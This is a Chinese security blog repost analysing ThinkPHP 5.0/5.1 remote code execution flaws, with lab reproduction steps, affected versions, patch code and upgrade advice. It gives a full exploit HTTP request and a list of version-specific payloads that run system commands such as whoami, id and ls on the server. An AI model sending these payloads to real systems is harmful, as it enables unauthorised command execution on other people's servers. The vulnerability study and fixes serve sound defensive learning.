php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结

最新推荐文章于 2024-07-09 14:44:43 发布
最新推荐文章于 2024-07-09 14:44:43 发布
阅读量1.4k 收藏 1
点赞数
文章标签: php5漏洞汇总

一、ThinkPHP 5.0.23 rce漏洞复现与总结

漏洞复现

thinkphp 5.0.23 rce

thinkphp 5.0.23 rce源码下载:

github:https://github.com/top-think/framework/tree/v5.0.231

影响版本

ThinkPHP 5.0系列 < 5.0.23

ThinkPHP 5.1系列 < 5.1.31

安全版本

ThinkPHP 5.0系列 5.0.23

ThinkPHP 5.1系列 5.1.31

漏洞原理

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞利用

1.启动vulhub靶场,访问

344d26d8a300dc685d0b94dcef68bddd.png

2.抓包复现,完整的数据是:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd1

90e3849aa0be21025a745fa68ca3c0ba.png

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls1

ceeb4060172ba550971cb15a00a2b8ba.png

3.完整数据包:

POST /index.php?s=captcha HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id1

2

3

4

5

6

7

8

9

10

11

手动修正

5.1版本

thinkphp/library/think/route/dispatch/Url.php 类的parseUrl方法,解析控制器后加上 添加

if ($controller && !preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller);

}1

2

3

4

5.0版本

thinkphp/library/think/App.php 类的module方法的获取控制器的代码后面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller);

}1

2

3

4

框架升级

进入到代码根目录 执行 composer update

目前thinkphp的 5.0(5.0.23) 以及 5.1(5.1.31) 的最新版本,已经修复此漏洞,建议大家项目都用目前最新版本。

二、ThinkPHP 5.x RCE 漏洞分析与利用总结

接下来将为大家进行漏洞分析以及对各个版本、场景下的利用进行详细的总结。

漏洞范围: <= 5.0.23、<= 5.1.32

5.0.x补丁:

https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de0031

5.1.x补丁:

https://github.com/top-think/framework/commit/2454cebcdb6c12b352ac0acd4a4e6b25b31982e61

Payload总结

1、<= 5.0.13

1.POST /?s=index/index

2.s=whoami&_method=__construct&method=&filter[]=system1

2

2、<= 5.0.23、5.1.0 <= 5.1.16

开启debug()

1.POST /

2._method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al1

2

3、<= 5.0.23

需要captcha的method路由,如果存在其他method路由,也是可以将captcha换为其他。

1.POST /?s=captcha HTTP/1.1

2._method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami&method=get1

2

4、5.0.0 <= version <= 5.1.32

error_reporting(0)关闭报错

1.POST /

2.c=exec&f=calc.exe&_method=filter1

2

学习参考链接:

1、https://blog.csdn.net/wuxianbing2012/article/details/104897634?utm_medium=distribute.pc_relevant.none-task-blog-searchFromBaidu-1.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-searchFromBaidu-1.control

2、https://blog.csdn.net/dengzhasong7076/article/details/102139816?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-10.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-10.control1

2

ERRORS团队

4b4e836a561cd32e2a6c74729abd2d6e.png

ERRORS团队源于网络空间安全的兴趣爱好者共同组建,致力于从网络安全的各个层面维护国家网络空间安全,团队成员拥有专业的渗透测试技术、安全评估能力、逆向分析技巧以及丰富的项目经验和实战经验。该团队是一支年轻的有生命力的团队,旨在通过知识分享、技术探讨提升网络安全意识和专业技能。

加入我们:

或者邮件联系: chihou.pro@gmail.com

文章来源: blog.csdn.net,作者:德古拉的杂货铺,版权归原作者所有,如需转载,请联系作者。

原文链接:blog.csdn.net/weixin_41438728/article/details/109847661

城闭喧
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
【web安全】DolphinPHP RCE漏洞分析
HBohan的博客
04-07 3881
DolphinPHP DolphinPHP(海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件、钩子、数据包之间的版本和依赖关系,进一步降低了代码和数据的冗余,以方便开发者快速构建自己的应用。 漏洞分析 看到application\common.php#action_log函数 观察到有
Thinkphp漏洞复现
最新发布
m0_74928613的博客
07-09 720
安装vulhub2、安装docker-compose。
验证自己的tp5漏洞 记录
Make
12-26 2481
手上有一个tp5.0.1*系统,正好验证是否修复了漏洞。 百度了一下: ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: 由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞 1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0...
Thinkphp5.1 反序列化漏洞复现
feng的博客
02-18 4430
前言 开始tp5.1的反序列化链的复现,这个链我上学期10月份的时候尝试复现过,但是当时的自己代码审计能力,反序列化的能力也都实在太菜,不足以理解这个链。这个链相比yii2,laravel5.7,5.8的那些链,长度和难度都提高了很多,思维的跳跃也很,自己也要想办法把它啃下来。 源码下载: thinkphp5源码 或者去github上下载也可以。 然后写个控制器: <?php namespace app\index\controller; class Unserialize { pub
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3920
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
tp5漏洞利用工具.zip
01-03
标题中的“tp5漏洞利用工具.zip”指的是一个包含利用ThinkPHP5框架中安全漏洞的工具包,这个压缩包主要用于测试和展示ThinkPHP5代码执行漏洞利用方式。描述提到,这个工具包含了两种方法,用于在目标系统上检测并...
(超级有用)ThinkPHP 5漏洞分析之SQL注入
MKAJZHAQZKJ的博客
06-16 3162
本次漏洞存在于Builder类的parseData方法中。由于程序没有对数据进行很好的过滤,将数据拼接进SQL语句,导致SQL注入漏洞的产生。漏洞影响版本:5.0.13<=ThinkPHP<=5.0.15、5.1.0<=ThinkPHP<=5.1.5。 环境搭建 $ composer create-project --prefer-dist topthink/think=5.0.15 v5.0.15 1. 安装后,因为默认framework版本为...
ThinkPHP 5.1.x SQL注入漏洞分析
Fly_鹏程万里
12-13 5166
一、背景介绍 ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。 在近期,ThinkPHP 框架被曝出存在SQL注入漏洞。由于SQL注入漏洞的危害性以及该框...
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
qq_50854662的博客
10-23 1433
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0.x、5.1.x、5.2.x 这几个版本,都无需登入可以进行远程代码执行。 漏洞版本: 5.0.x5.1.x5.2.x 漏洞搭建
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8705
ThinkPHP5系列远程代码执行漏洞复现(详细)
thinkPHP5 最新代码执行漏洞
xiaoziabc的博客
01-13 2810
s=captcha _method=__construct&amp;filter[]=system&amp;method=get&amp;server[REQUEST_method]=dir   http://127.0.0.1/tp5.0.12_full/public/index.php?s=index/\think\app/invokefunction&amp;function=call...
thinkphp5.0.X 全版本变量覆盖导致的RCE分析
小石的博客
11-12 2452
thinkphp5.0.0分析起 POST /thinkphp5.0.0 HTTP/1.1 Host: www.example.com a=whoami&_method=__construct&filter=system&method=GET 5.0.0版本为什么是这样的Payload? 第一次调用Request下的method方法,看到是检查路由的时候。 _met...
vulhub中ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
yougexiaojiuguan的博客
03-06 1026
漏洞复现过程的记录
thinkphp 5-rcerce漏洞getshell)
weixin_51692662的博客
11-03 3095
thinkphp 5-rcerce漏洞getshell)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值